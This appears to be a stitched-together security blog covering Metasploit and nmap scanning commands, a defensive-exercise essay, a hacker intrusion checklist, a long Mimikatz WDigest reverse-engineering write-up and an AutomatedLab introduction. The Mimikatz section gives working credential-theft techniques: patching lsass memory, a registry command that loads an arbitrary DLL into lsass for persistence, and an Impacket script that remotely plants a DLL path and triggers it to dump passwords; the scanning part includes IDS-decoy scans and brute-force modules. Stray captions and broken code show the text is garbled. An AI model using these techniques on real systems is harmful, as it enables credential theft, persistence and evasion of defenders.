Jimm Wayans
nmap scanning

Active Information Gathering with Metasploit-Framework

Using Nmap to perform port scanning

Using -sT scanning mode is the default scanning mode of Nmap. The status of the target port is accurately judged through the TCP three-way handshake packet. Since three connections are established, it is extremely easy to be captured by the target firewall.

msf> nmap -sT 

The -sS scan mode does not perform three-way handshake, it is called semi-open scan, also known as stealth scan. Compared to TCP scanning, it is faster and more secure.

msf> nmap -sS

The –sU scan mode is the fastest scan method, because UDP only sends and receives, but there may be some errors between the scan results and the above two scan methods.

msf> nmap -sU

Operating system identification.
Nmap can identify the target operating system in two ways:

1. The commonly used -O parameter, the -O parameter is an advanced parameter provided by Nmap, which is usually used alone.

msf> nmap -O

2. The -sV parameter can be used together with the above port scan parameters, and nmap will add the identification result of the system version at the end of the scan result.

msf> nmap -sSV

Nmap security scan

Usually, the scan initiated on the target site or host will be recorded by the WAF or IDS, which is extremely insecure for the tester, so the intrusive and deceptive scans are hidden from the tester. IP information is necessary, Nmap provides the -D advanced parameter, if you provide 2 IP addresses, then Nmap will leave 3 IP addresses in the WAF log to confuse the audience and ensure the test as much as possible the safety of the user.

msf> nmap -sS -D, 

1. TCP port scan

msf> use auxiliary/scanner/portscan/tcp 

2. SYN port scan

msf> use auxiliary/scanner/portscan/syn

3. Call nmap

In metasploit-framework use db_nmap to do a complete banner grabbing, use the following command:

msf> db_nmap -Pn -sTV -T4 --open --min-parallelism 64 --version-all -p - 22

The -Pn parameter tells Nmap that the target site has been determined to be online, no further detection is required, and the detection process of whether it is online or not is skipped. -sTV means to scan in TCP mode, and to determine the banner information and version of each port at the same time. The port, the –min-parallelism parameter executes a minimum number of 64 parallelisms, the –version-all parameter indicates that all probes of nmap are used to identify the service details, and the -p parameter is set to – indicates that all ports of the target are scanned.

4. Use ARP for live host scanning

msf> use auxiliary/scanner/discovery/arp_sweep  set RHOST   set THREADS 10  run

5. Use UDP to detect live hosts

msf> use auxiliary/scanner/discovery/udp_sweep  set RHOST   set THREADS 10  run

6. Use SMB to detect live hosts

msf> use auxiliary/scanner/smb/smb_enumshares   set RHOSTS   set THREADS 10  run

7. SMB version scan

msf> use auxiliary/scanner/smb/smb_version 

8. SMB brute force (dictionary required)

msf> use auxiliary/scanner/smb/smb_login

9. SSH version scan

msf> use auxiliary/scanner/ssh/ssh_version

10. FTP version scan

msf> use auxiliary/scanner/ftp/ftp_version

11. SMTP enumeration

msf> use auxiliary/scanner/smtp/smtp_enum

12. SNMP login

msf> use auxiliary/scanner/snmp/snmp_enum

13. SNMP login

msf> use auxiliary/scanner/snmp/snmp_login

14. WinRM scan

msf> use auxiliary/scanner/winrm/winrm_auth_methods

15. WinRM brute force cracking

msf> use auxiliary/scanner/winrm/winrm_cmd

Offensive and Defense Exercise Preparation | How to build an effective corporate security defense system

After the epidemic, work and life gradually returned to normal. For the network security industry, offensive and defensive drills are once again on the agenda. In the new year, how do companies prepare for defense? Let us find the answer from the review and reflection in 2019/20.

In 2019/20, offensive and defensive exercises once became a buzzword in the security circle, and such activities of all sizes continued. After the experience, many companies will re-examine their own security defense capabilities, and even the protection capabilities of their partners. The essence of offensive and defensive exercises is to verify the effectiveness of corporate security defense capabilities from the attacker’s perspective. Therefore, this article will introduce from the attacker’s perspective to provide some practical suggestions for companies facing offensive and defensive exercise needs or wishing to build an effective defense system.

Recurring attack chain

When it comes to attacks, we have to mention the “Cyber ​​Kill Chain”. According to the attacking methods that have appeared in actual offensive and defensive exercises in recent years, we have drawn the “attack chain” as shown in the following figure:

Cyber Kill Chain

Attack chain in offensive and defensive exercises

Everything is difficult at the beginning. The first problem that the attacker encounters after selecting the attack target is often find a breakthrough. Most of them will combine domain name, IP and other asset scanning to step on and infiltrate the target business system. At this time, the Web is still the main one. Breakthrough. In the past, web vulnerabilities have emerged endlessly. Attackers can use web servers to implant variants of Webshell and then invade further, gain server permissions, and continue to collect intranet information to expand their results. Many companies have problems with lack of defense or bypass of defense in Web security. Many web assets have not been effectively discovered, or WAF defenses have been bypassed, so how to formulate effective WAF rules in the first time has become the primary problem that enterprises urgently need to solve, which is to block the entrance of attackers.

By discovering and exploiting vulnerabilities in border servers, attackers often gain the first entry point of intrusion, such as Webshell, and even directly gain control of the server. Server control is the main battlefield of offensive and defensive confrontation. The business, data, and core assets of the enterprise are all on the server. The attacker’s goal is often to obtain the data of core assets or control the business of core assets to further penetrate. On the infiltrated server, the attacker uses a variant of Webshell such as “ice scorpion”, etc., and even Rootkit further controls the server. After invading the internal network, they often continue to collect data and information on the internal network and install multiple backdoors to achieve further control. These backdoors often use DNS tunnel communication, C&C communication, etc. to connect to the control end. Some high-level attackers Logs are often erased or even fake logs are created to confuse the defender.

The attack process is a dynamic process of continuous correction. A good attacker often combines the information he has obtained to continuously infiltrate and analyze the target.

The defender will become passive or even anxious in this offensive and defensive exercise. How to effectively detect the attacker and block them in time has become an urgent problem to be solved. Common protection methods include blocking the attacker’s IP, setting protection strategies, combining existing security product strategies with continuous analysis, and operating and revising existing protection strategies.

Constructing the defensive quadrant

Combining the attacker’s attack chain and demand urgency, I constructed a set of defense quadrants based on offensive and defensive confrontation. The quadrant not only includes products, but also includes operations and services, hoping to help the defender deploy a security system quickly and effectively. Good protection.


Defensive quadrant

1. The defense quadrant

The defense quadrant is the most important quadrant. It contains the bottom-line products of enterprise protection. The products are mainly capable of preventing and blocking hacker attacks. In the real-world offensive and defensive confrontation, they can resist most attackers. Here is an introduction. WAF, FW, HIPS. WAF can withstand most of the intrusions from the Web, especially the programmable WAF. When faced with new vulnerabilities in offensive and defensive exercises, it can be blocked by writing scripts for the first time. The new generation of WAF also has semantic analysis technology. , Which can effectively reduce false alarms and improve the defense capability of the defender against unknown threats. The firewall can effectively control the assets at the border and detect and block malicious communication behaviors in the network. As for the key targets of hacker attacks such as assets on the server, HIPS installed in the server operating system can detect attacks such as Webshell, Rootkit, and hacking actions (rebound shell, brute force cracking, privilege escalation, etc.) in the first time. Features and executes interception and protection to improve the level of defense against core assets.

2. Detection quadrant

The detection quadrant focuses on the detection and trapping of hackers. Products in this quadrant can quickly detect intrusion, detect hacker attacks and trap and profile them, such as HIDS, NTA, and Honeypot. Here we focus on NTA and Honeypot. NTA products are called Network Traffic Analysis, but I prefer to understand it as Network Threat Analysis, that is, through traffic modeling and analysis of network threats, real-time perception and early warning, this type of products compared to traditional IPS in traffic Coverage and threat modeling are more complete and comprehensive. Honeypot (Honeypot) is a very good tool for detecting hacker intrusions. In a real network environment, the defender will not trigger the honeypot, and the attacker IP found through the honeypot can be directly linked to the firewall for blocking, and Its unique JSONP probe can perform attack profile on hackers, so as to grasp the hacker intrusion activities in the first time. The profile function plays a vital role in tracing the source of the attack.

3. Safe Operation Quadrant

The security operations quadrant is a combined quadrant, which is a combination of the previous two. Here, we recommend the product to cooperate with the security analyst model. In the past few years, penetration testing engineers have become very popular, which is caused by many projects that are result-oriented and push back corporate security construction. With the emergence of security vulnerabilities and the increase in the number of hacking incidents, security analysts will become more important in the future. They can analyze the effectiveness of various security product configuration strategies and deployment locations that have been deployed by the defender, and adjust them to the best level. Security incidents are investigated and traced to assist enterprises in solving the last mile problem of safety. Product tools can choose SOAR for security orchestration and automated response. They can combine the strategy orchestration of security analysts with the APIs of various systems to adjust protection and response strategies to achieve unified analysis, centralized display, and rapid processing to achieve a secure closed loop.

4. Threat Intelligence Quadrant

Intelligence work in the Threat Intelligence Quadrant is divided into two categories. The first type is the collection and analysis of real-time intelligence. In the process of offensive and defensive exercises, especially in large-scale offensive and defensive exercises, intelligence becomes extremely important. The defender should continue to collect attack intelligence, such as the attack method of the attacking team, the attacker’s source IP, common tools, and other information, and add this intelligence to the product operation and maintenance of the defense quadrant in a timely manner. The second category belongs to passive intelligence collection. Take scanner products as an example. The new generation of scanners often have the ability to quickly analyze assets and detect vulnerabilities. Considering the attacker’s methods, the vulnerability detection here should be based on Web vulnerabilities. , And also covers system vulnerability scanning support. This type of scanner can help security analysts quickly detect assets during the protection period in real time, and actively or passively scan for vulnerabilities in order to resolve security issues as soon as possible.


The security products in the above four quadrants combined with security analysis services can quickly improve the defense capabilities of the defender to a higher level in actual offensive and defensive exercises. The essence of offensive and defensive confrontation is to fully expose problems and verify the effectiveness of existing protection methods, while continuously correcting hidden problems that have been discovered. This will be a continuous process. The defender also needs to continue to master its own asset dynamics, vulnerability updates, and vulnerabilities. Threat intelligence and other information are comprehensively used to achieve sufficient defensive effects.

It is hoped that each defender can quickly and reasonably complement the shortcomings in the offensive and defensive exercises according to their actual conditions, combined with effective security analysis and operational strategies, to detect and block more attackers as soon as possible from their own defense gates.

web security

How Do Hackers Break Into Websites?

As a company’s operation and maintenance personnel, especially for large and medium-sized enterprises, it is not uncommon for websites and web applications to be attacked by hackers.

Web apps and website can be divided into three sections: individual operations, team/company operations, and government operations.

The proportion of personal websites is still very large, and most of these websites use open source CMSs.

Such as blogs: WordPress, Joomla, Typecho, Z-blog, More…,

Community categories: Discuz, PHPwind, StartBBS, Mybb, etc.

The proportion of commonly used open source CMSs used by team/company websites is also very large, and government websites are basically outsourced to develop more.

If it is broader, it can be divided into two major parts: open source and closed source.

What can effectively illustrate the pseudo-security of a website is to prove from the perspective of actual combat whether it is really solid.

The reason why I talk about intrusion methods here is not to teach you how to invade the website, but to understand the various methods of intrusion. Only by knowing yourself how the attacks happen, then can you learn how to protect.

A kitchen knife can be used to cut vegetables, and it can also be used to kill people.

Let’s talk about some common procedures for hackers to invade websites.

The common process for hackers to attack and hack websites

1. Information Gathering

1.1 Whois information – registrant, phone, email, DNS, address

1.2 Google hack – sensitive directories, sensitive files, more information collection

1.3 Server IP – Nmap scan, port corresponding service, C segment

1.4 Side note – Bing query

1.5 If you encounter CDN – Cloudflare (bypass), start with subdomains (mail, postfix), DNS transfer domain vulnerabilities

1.6 Server, components (fingerprint) – operating system, web server (apache, nginx, iis), scripting language

Through the information gathering process, the attacker has basically been able to obtain most of the information about the website. Of course, information gathering is the first step of the website invasion and determines the success of the subsequent attack.

2. Vulnerability Scanning 

2.1 ​​Scan the website/web application for vulnerabilities – (tools: acunetix, burpsuite, dirsearch, nikto etc)

2.2 XSS, CSRF, XSIO, SQL injection, permission bypass, arbitrary file reading, file inclusion…

2.3 Test for upload vulnerabilities – truncation, modification, analysis vulnerabilities

2.4 Is there a verification code (2fa)? – brute force attempt

By now, the attacker has a lot of information about your website and may have found vulnerabilities affecting your website. In the next step, they will begin to use those vulnerabilities to gain access to your website.

3. Vulnerability Exploitation

3.1 Thinking about the purpose – what kind of effect is achieved. (Exploit any found vulnerabilities)

3.2 Hidden, destructive – Find the corresponding EXP attack payload based on the detected application fingerprint or write it yourself

3.3 Start the vulnerability exploit, obtain the corresponding permissions, and get a webshell on the server, according to different scenarios

4. Privilege Escalation

4.1 Choose different attack payloads for privilege escalation according to the server type (Use Metasploit where possible)

4.2 Permission escalation is not possible, start password guessing based on the information obtained, and retrospective information collection

5. Implant a Backdoor

5.1 Concealment

5.2 Check and update regularly to maintain persistence

6. Log cleanup (Clear your tracks)

6.1 Camouflage, concealment, to avoid alarming, they usually choose to delete the specified log

6.2 According to the time period, find too many corresponding log files. . .

Having said so much, how much do you understand these steps? Read more and research online.

Of course, the type of attack may largely depend on the motivation the hacker has.

Although the time is relatively long, the general idea is like this.

After talking about the intrusion process, let’s talk about why enterprise websites need to be secured..

First: Cybersecurity law regulations

The proposed cybersecurity law clearly requires for the provisions of critical information infrastructure operators (such as critical information infrastructure operators should themselves or Entrust a network security service organization to conduct inspection and assessment of its network security and possible risks at least once a year, and report the inspection and assessment results and improvement measures to the relevant department responsible for the security protection of critical information infrastructure), which is quite mandatory ——In the legal liability section, it is clearly mentioned that if these regulations are not fulfilled, the relevant competent department shall order rectification and give warnings;

Regarding the interpretation of the Cyber ​​Security Law, you can click here to view

It is worth noting that penetration testing is a commonly used and very important method in information security risk assessment and web security.

Second: Penetration testing helps PCI DSS compliance construction

In PCI DSS (Payment Card Industry Security Standards Council) Section 11.3, there is such a requirement: at least every year or after any major upgrades or modifications to the infrastructure or applications (such as operating system upgrades, environment additions) Adding a network server to a sub-network or environment) needs to perform internal and external penetration testing.

Third: Baseline requirements for ISO27001 certification

ISO27001 appendix “A12 Information System Development, Acquisition and Maintenance” requirements establishes a software security development cycle, and specifically proposes that additional penetration tests should be conducted with reference to, for example, OWASP standards before going live.

Fourth: Requirements in the CBK’s multiple regulatory guidelines

According to the clear requirements in the multiple regulatory guidelines issued by the Central Bank of Kenya, the bank’s security strategy, internal control system, risk management, system security and other aspects need to be penetrated testing and control capabilities inspection and evaluation.

Fifth: Minimize business losses

In addition to meeting the compliance requirements of the policy, improving the operational safety of customers or meeting the requirements of business partners. The ultimate goal should be to minimize business risks.

Companies need to conduct as many penetration tests as possible to keep security risks under control.

In the process of website development, many hidden security problems that are difficult to control and discover will occur. When these large numbers of flaws are exposed to the external network environment, information security threats are generated.

This problem can be effectively prevented by companies through regular penetration testing, so that they can be detected and resolved early. The system will become more stable and secure after being tested and strengthened by cybersecurity professionals. The test report can help managers make better project decisions, at the same time prove the necessity of increasing the security budget, and convey security issues to the senior management. .

The difference between penetration testing and security testing

Penetration testing is different from traditional security scanning. In the overall risk assessment framework, the relationship between vulnerability and security scanning can be described as “continuing”, that is, as mentioned above, it is a verification and supplement to the scanning results.

In addition, the biggest difference between penetration testing and traditional security scanning is that penetration testing requires a lot of manual intervention.

These tasks are mainly initiated by cybersecurity professionals. On the one hand, they use their professional knowledge to conduct in-depth analysis and judgment on the scan results.

On the other hand, it is based on their experience to manually check and test the hidden security issues that the scanner cannot find, so as to make more accurate verification (or simulated intrusion) behavior.

Incase you need security service such as penetration testing, drop me a line on twitter @jimmwayans and I’ll be glad to work with you.


Mimikatz Exploration – WDigest

Mimikatz, to this day, remains the tool of choice when it comes to extracting credentials from lsass on Windows operating systems. Of course this is due to the fact that with each new security control introduced by Microsoft, GentilKiwi always has a way out. If you have ever looked at the effort that goes into Mimikatz, this is no easy task, with all versions of Windows x86 and x64 supported. And of course with the success of Mimikatz over the years, BlueTeam are now very adept at detecting its use in its many forms. Essentially, execute Mimikatz on a host, and if the environment has any maturity at all you’re likely to be flagged. Almost all modern EDRs will detect Mimikatz very fast.

Its always very important to understand your tools beyond just executing a script and running automated commands. With security vendors reducing and monitoring the attack surface of common tricks often faster than we can discover fresh methods, knowing how a particular technique works down to the API calls can offer a lot of benefits when avoiding detection in well protected environments.

That being said, Mimikatz is a tool that is carried along with most post-exploitation toolkits in one form or another. And while some security vendors are monitoring for process interaction with lsass, many more have settled on attempting to identify Mimikatz itself.

I’ve been toying with the idea of stripping down Mimikatz for certain engagements (mainly those where exfiltrating a memory dump isn’t feasible or permitted), but it has been bugging me for a while that I’ve spent so long working with a tool that I’ve rarely reviewed low-level.

So I wanted to change this and explore some of its magic, starting with where it all began, WDigest. Specifically, looking at how cleartext credentials are actually cached in lsass, and how they are extracted out of memory with "sekurlsa::wdigest". This will mean disassembly and debugging, but hopefully by the end you will see that while its difficult to duplicate the amount of effort that has gone into Mimikatz, if your aim is to only use a small portion of the available functionality, it may be worth crafting a custom tool based on the Mimikatz source code, rather than opting to take along the full suite.

To finish off the post I will also explore some additional methods of loading arbitrary DLL’s within lsass, which can hopefully be combined with the code examples demonstrated.

Note: This post uses Mimikatz source code heavily as well as the countless hours dedicated to it by its developer(s). This effort should become more apparent as you see undocumented structures which are suddenly revealed when browsing through code. Thanks to Mimikatz, Benjamin Delpy and Vincent Le Toux for their awesome work.

How does Mimikatz’s “sekurlsa::wdigest” actually work?

As mentioned, in this post we will look at is WDigest, arguably the feature that Mimikatz became most famous for. WDigest credential caching was of course enabled by default up until Windows Server 2008 R2, after which caching of plain-text credentials was disabled.

When reversing an OS component, I usually like to attach a debugger and review how it interacts with the OS during runtime. Unfortunately in this case this isn’t going to be just as simple as attaching WinDBG to lsass, as pretty quickly you’ll see Windows grind to a halt before warning you of a pending reboot. Instead we’ll have to attach to the kernel and switch over to the lsass process from Ring-0.

With a kernel debugger attached, we need to grab the EPROCESS address of the lsass process, which is found with the !process 0 0 lsass.exe command:

infosec kenya


With the EPROCESS address identified (ffff9d01325a7080 above), we can request that our debug session is switched to the lsass process context:


A simple lm will show that we now have access to the WDigest DLL memory space:




If at this point you find that symbols are not processed correctly, a .reload /user will normally help.

With the debugger attached, let’s dig into WDigest.

Diving into wdigest.dll and a little of lsasrv.dll

If we look at Mimikatz source code, we can see that the process of identifying credentials in memory is to scan for signatures. Let’s take the opportunity to use a tool which appears to be in vogue at the minute, Ghidra, and see what Mimikatz is hunting for.

As I’m currently working on Windows 10 x64, I’ll focus on the PTRN_WIN6_PasswdSet signature seen below:

how to be a hacker


After providing this search signature to Ghidra, we reveal what Mimikatz is scanning memory for:

Cyber africa

how to be a hacker



Above we have the function LogSessHandlerPasswdSet. Specifically the signature references just beyond the l_LogSessList pointer. This pointer is key to extracting credentials from WDigest, but before we get ahead of ourselves, let’s back up and figure out what exactly is calling this function by checking for cross references, which lands us here:

how to be a hacker


Here we have SpAcceptCredentials which is an exported function from WDigest.dll, but what does this do?


This looks promising as we can see that credentials are passed via this callback function. Let’s confirm that we are in the right place. In WinDBG we can add a breakpoint with bp wdigest!SpAcceptCredentials after which we use the runas command on Windows to spawn a shell:


This should be enough to trigger the breakpoint. Inspecting the arguments to the call, we can now see credentials being passed in:


If we continue with our execution and add another breakpoint on wdigest!LogSessHandlerPasswdSet, we find that although our username is passed, a parameter representing our password cannot be seen. However, if we look just before the call to LogSessHandlerPasswdSet, what we find is this:


This is actually a stub used for Control Flow Guard (Ghidra 9.0.3 looks like it has an improvement for displaying CFG stubs), but following along in a debugger shows us that the call is actually to LsaProtectMemory:


This is expected as we know that credentials are stored encrypted within memory. Unfortunately LsaProtectMemory isn’t exposed outside of lsass, so we need to know how we can recreate its functionality to decrypt extracted credentials. Following with our disassembler shows that this call is actually just a wrapper around LsaEncryptMemory:

how to be a hacker


And LsaEncryptMemory is actually just wrapping calls to BCryptEncrypt:

how to be a hacker


Interestingly, the encryption/decryption function is chosen based on the length of the provided blob of data to be encrypted. If the length of the buffer provided is divisible by 8 (donated by the “param_2 & 7” bitwise operation in the screenshot above), then AES is used. Failing this, 3Des is used.

So we now know that our password is encrypted by BCryptEncrypt, but what about the key? Well if we look above, we actually see references to lsasrv!h3DesKey and lsasrv!hAesKey. Tracing references to these addresses shows that lsasrv!LsaInitializeProtectedMemory is used to assign each an initial value. Specifically each key is generated based on calls to BCryptGenRandom:


This means that a new key is generated randomly each time lsass starts, which will have to be extracted before we can decrypt any cached WDigest credentials.

Back to the Mimikatz source code to confirm that we are not going too far off track, we see that there is indeed a hunt for the LsaInitializeProtectedMemory function, again with a comprehensive list of signatures for differing Windows versions and architectures:

how to be a hacker


And if we search for this within Ghidra, we see that it lands us here:


Here we see a reference to the hAesKey address. So, similar to the above signature search, Mimikatz is hunting for cryptokeys in memory.

Next we need to understand just how Mimikatz goes about pulling the keys out of memory. For this we need to refer to kuhl_m_sekurlsa_nt6_acquireKey within Mimikatz, which highlights the lengths that this tool goes to in supporting different OS versions. We see that hAesKey and h3DesKey (which are of the type BCRYPT_KEY_HANDLE returned from BCryptGenerateSymmetricKey) actually point to a struct in memory consisting of fields including the generated symmetric AES and 3DES keys. This struct can be found documented within Mimikatz:

typedef struct _KIWI_BCRYPT_HANDLE_KEY {
    ULONG size;
    ULONG tag;    // 'UUUR'
    PVOID hAlgorithm;
    PVOID unk0;

We can correlate this with WinDBG to make sure we are on the right path by checking for the “UUUR” tag referenced above:


At offset 0x10 we see that Mimikatz is referencing PKIWI_BCRYPT_KEY which has the following structure:

typedef struct _KIWI_BCRYPT_KEY81 {
    ULONG size;
    ULONG tag;    // 'MSSK'
    ULONG type;
    ULONG unk0;
    ULONG unk1;
    ULONG unk2; 
    ULONG unk3;
    ULONG unk4;
    PVOID unk5;    // before, align in x64
    ULONG unk6;
    ULONG unk7;
    ULONG unk8;
    ULONG unk9;
    KIWI_HARD_KEY hardkey;

And sure enough, following along with WinDBG reveals the same referenced tag:


The final member of this struct is a reference to the Mimikatz named KIWI_HARD_KEY, which contains the following:

typedef struct _KIWI_HARD_KEY {
    ULONG cbSecret;
    BYTE data[ANYSIZE_ARRAY]; // etc...

This struct consists of the the size of the key as cbSecret, followed by the actual key within the data field. This means we can use WinDBG to extract this key with:


This gives us our h3DesKey which is 0x18 bytes long consisting of
b9 a8 b6 10 ee 85 f3 4f d3 cb 50 a6 a4 88 dc 6e ee b3 88 68 32 9a ec 5a.

Knowing this, we can follow the same process to extract hAesKey:


Now that we understand just how keys are extracted, we need to hunt for the actual credentials cached by WDigest. Let’s go back to the l_LogSessList pointer we discussed earlier. This field corresponds to a linked list, which we can walk through using the WinDBG command !list -x "dq @$extret" poi(wdigest!l_LogSessList):


The structure of these entries contain the following fields:

typedef struct _KIWI_WDIGEST_LIST_ENTRY {
    struct _KIWI_WDIGEST_LIST_ENTRY *Flink;
    struct _KIWI_WDIGEST_LIST_ENTRY *Blink;
    ULONG    UsageCount;
    struct _KIWI_WDIGEST_LIST_ENTRY *This;
    LUID LocallyUniqueIdentifier;

Following this struct are three LSA_UNICODE_STRING fields found at the following offsets:

  • 0x30 – Username
  • 0x40 – Hostname
  • 0x50 – Encrypted Password

Again we can check that we are on the right path with WinDBG using a command such as:

!list -x "dS @$extret+0x30" poi(wdigest!l_LogSessList)

This will dump cached usernames as:


And finally we can dump encrypted password using a similar command:

!list -x "db poi(@$extret+0x58)" poi(wdigest!l_LogSessList)


And there we have it, all the pieces required to extract WDigest credentials from memory.

So now that we have all the information needed for the extraction and decryption process, how feasible would it be to piece this together into a small standalone tool outside of Mimikatz? To explore this I’ve created a heavily commented POC which is available here. When executed on Windows 10 x64 (build 1809), it provides verbose information on the process of extracting creds:

how to be a hacker


By no means should this be considered OpSec safe, but it will hopefully give an example of how we can go about crafting alternative tooling.

Now that we understand how WDigest cached credentials are grabbed and decrypted, we can move onto another area affecting the collection of plain-text credentials, “UseLogonCredential”.

But UseLogonCredential is 0

So as we know, with everyone running around dumping cleartext credentials, Microsoft decided to disable support for this legacy protocol by default. Of course there will be some users who may be using WDigest, so to provide the option of re-enabling this, Microsoft pointed to a registry key of HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential. Toggling this from ‘0’ to ‘1’ forces WDigest to start caching credentials again, which of course meant that pentesters were back in the game… however there was a catch, toggling this setting required a reboot of the OS, and I’ve yet to meet a client who would allow this outside of a test environment.

The obvious question is… why do you need to reboot the machine for this to take effect?

Edit: As pointed out by GentilKiwi, a reboot isn’t required for this change to take effect. I’ve added a review of why this is at the end of this section.

Let’s take a look at SpAcceptCredentials again, and after a bit of hunting we find this:


Here we can clearly see that there is a check for two conditions using global variables. If g_IsCredGuardEnabled is set to 1, or g_fParameter_UseLogonCredential is set to 0, we find that the code path taken is via LogSessHandlerNoPasswordInsert rather than the above LogSessHandlerPasswdSet call. As the name suggests, this function caches the session but not the password, resulting in the behaviour we normally encounter when popping Windows 2012+ boxes. It’s therefore reasonable to assume that this variable is controlled by the above registry key value based on its name, and we find this to be the case by tracing its assignment:


By understanding what variables within WDigest.dll control credential caching, can we subvert this without updating the registry? What if we update that g_fParameter_UseLogonCredential parameter during runtime with our debugger?

how to be a hacker


Resuming execution, we see that cached credentials are stored again:


Of course most things are possible when you have a kernel debugger hooked up, but if you have a way to manipulate lsass memory without triggering AV/EDR (see our earlier Cylance blog post for one example of how you would do this), then there is nothing stopping you from crafting a tool to manipulate this variable. Again I’ve created a heavily verbose tool to demonstrate how this can be done which can be found here.

This example will hunt for and update the g_fParameter_UseLogonCredential value in memory. If you are operating against a system protected with Credential Guard, the modifications required to also update this value are trivial and left as an exercise to the reader.

With our POC executed, we find that WDigest has now been re-enabled without having to set the registry key, allowing us to pull out credentials as they are cached:

how to be a hacker


Again this POC should not be considered as OpSec safe, but used as a verbose example of how you can craft your own.

Now of course this method of enabling WDigest comes with risks, mainly the WriteProcessMemory call into lsass, but if suited to the environment it offers a nice way to enable WDigest without setting a registry value. There are also other methods of acquiring plain-text credentials which may be more suited to your target outside of WDigest (memssp for one, which we will review in a further post).

Edit: As pointed out by GentilKiwi, a reboot is not required for UseLogonCredential to take effect… so back to the disassembler we go.

Reviewing other locations referencing the registry value, we find wdigest!DigestWatchParamKey which monitors a number of keys including:

how to be a hacker


The Win32 API used to trigger this function on update is RegNotifyKeyChangeValue:

how to be a hacker


And if we add a breakpoint on wdigest!DigestWatchParamKey in WinDBG, we see that this is triggered as we attempt to add a UseLogonCredential:

how to be a hacker


Bonus Round – Loading an arbitrary DLL into LSASS

So while digging around with a disassemler I wanted to look for an alternative way to load code into lsass while avoiding potentially hooked Win32 API calls, or by loading an SSP. After a bit of disassembly, I came across the following within lsasrv.dll:

how to be a hacker


This attempt to call LoadLibraryExW on a user provided value can be found within the function LsapLoadLsaDbExtensionDll and allows us to craft a DLL to be loaded into the lsass process, for example:

                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
    switch (ul_reason_for_call)

        // Insert l33t payload here


    // Important to avoid BSOD
    return FALSE;

It is important that at the end of the DllMain function, we return FALSE to force an error on LoadLibraryEx. This is to avoid the subsequent call to GetProcAddress. Failing to do this will result in a BSOD on reboot until the DLL or registry key is removed.

With a DLL crafted, all that we then need to do is create the above registry key:

New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NTDS -Name LsaDbExtPt -Value "C:\xpnsec.dll"

Loading of the DLL will occur on system reboot, which makes it a potential persistence technique for privileged compromises, pushing your payload straight into lsass (as long as PPL isn’t enabled of course).

Bonus Round 2 – Loading arbitrary DLL into LSASS remotely

After some further hunting, a similar vector to that above was found within samsrv.dll. Again a controlled registry value is loaded into lsass by a LoadLibraryEx call:

how to be a hacker


Again we can leverage this by adding a registry key and rebooting, however triggering this case is a lot simpler as it can be fired using SAMR RPC calls.

Let’s have a bit of fun by using our above WDigest credential extraction code to craft a DLL which will dump credentials for us.

To load our DLL, we can use a very simple Impacket Python script to modify the registry and add a key to HKLM\SYSTEM\CurrentControlSet\Services\NTDS\DirectoryServiceExtPt pointing to our DLL hosted on an open SMB share, and then trigger the loading of the DLL using a call to hSamConnect RPC call. The code looks like this:

from impacket.dcerpc.v5 import transport, rrp, scmr, rpcrt, samr
from impacket.smbconnection import SMBConnection
def trigger_samr(remoteHost, username, password):
print(“[*] Connecting to SAMR RPC service”)
rpctransport = transport.SMBTransport(remoteHost, 445, r’\samr’, username, password, “”, “”, “”, “”)
dce = rpctransport.get_dce_rpc()
except (Exception) as e:
print(“[x] Error binding to SAMR: %s” % e)
print(“[*] Connection established, triggering SamrConnect to force load the added DLL”)
# Trigger
print(“[*] Triggered, DLL should have been executed…”)
def start(remoteName, remoteHost, username, password, dllPath):
winreg_bind = r’ncacn_np:445[\pipe\winreg]’
hRootKey = None
subkey = None
rrpclient = None
print(“[*] Connecting to remote registry”)
rpctransport = transport.SMBTransport(remoteHost, 445, r’\winreg’, username, password, “”, “”, “”, “”)
except (Exception) as e:
print(“[x] Error establishing SMB connection: %s” % e)
# Set up winreg RPC
rrpclient = rpctransport.get_dce_rpc()
except (Exception) as e:
print(“[x] Error binding to remote registry: %s” % e)
print(“[*] Connection established”)
print(“[*] Adding new value to SYSTEM\\CurrentControlSet\\Services\\NTDS\\DirectoryServiceExtPtr”)
# Add a new registry key
ans = rrp.hOpenLocalMachine(rrpclient)
hRootKey = ans[‘phKey’]
subkey = rrp.hBaseRegOpenKey(rrpclient, hRootKey, “SYSTEM\\CurrentControlSet\\Services\\NTDS”)
rrp.hBaseRegSetValue(rrpclient, subkey[“phkResult”], “DirectoryServiceExtPt”, 1, dllPath)
except (Exception) as e:
print(“[x] Error communicating with remote registry: %s” % e)
print(“[*] Registry value created, DLL will be loaded from %s” % (dllPath))
trigger_samr(remoteHost, username, password)
print(“[*] Removing registry entry”)
rrp.hBaseRegDeleteValue(rrpclient, subkey[“phkResult”], “DirectoryServiceExtPt”)
except (Exception) as e:
print(“[x] Error deleting from remote registry: %s” % e)
print(“[*] All done”)
print(“LSASS DirectoryServiceExtPt POC\n @_xpn_\n)
start(“”, “”, “test”, “wibble”, \\\\opensharehost\\ntds\\legit.dll”)

And in practice, we can see credentials pulled from memory:


The code for the DLL used can be found here, which is a modification of the earlier example.

So hopefully this post has given you an idea as to how WDigest credential caching works and how Mimikatz goes about pulling and decrypting passwords during "sekurlsa::wdigest". More importantly I hope that it will help anyone looking to craft something custom for their next assessment. I’ll be continuing by looking at other areas which are commonly used during an engagement, but if you have any questions or suggestions, give me a shout at the usual places.

Automated Lab

Automated Lab: Automate Your Active Directory Security Lab

Building an active directory security lab is not easy, it requires time and resources as well as skills. What if we had an automated way of doing all the hard work?

Well, that’s where AutomatedLab! Is convenient!

AutomatedLab (abbreviated as AL ) is an automated construction framework for Windows environments developed by Microsoft . You can use it to create labs in a variety of Active Directory environments. In addition to the local Hyper-V environment, it can also be built on Azure. And what I personally think is the most powerful is that by passing the lab construction script (ps1) to another person, he/she can build the same environment. I think this is ideal for training purposes and general learning.

Alright, let’s use AutomatedLab to automatically build the ideal Active Directory lab environment!

AutomatedLab (AL) enables you to

  • Set up lab and test environments
  • On Hyper-v or Azure with multiple products
  • Including just a single VM quickly.

Require one:

  • .NET 4.7.1 (Windows PowerShell)
  • .NET Core 2+ (PowerShell 6+)

Require one: Hyper-V Host Azure Subscription


  • Operating System DVD ISO Images


There are two options installing AutomatedLab:

  • You can use the MSI installer published on GitHub.
  • Or you install from the PowerShell Gallery using the cmdlet Install-Module.
    Please note that this is the ONLY way to install AutomatedLab and its dependencies in PowerShell Core/PowerShell 7 on both Windows and Linux/Azure Cloud Shell
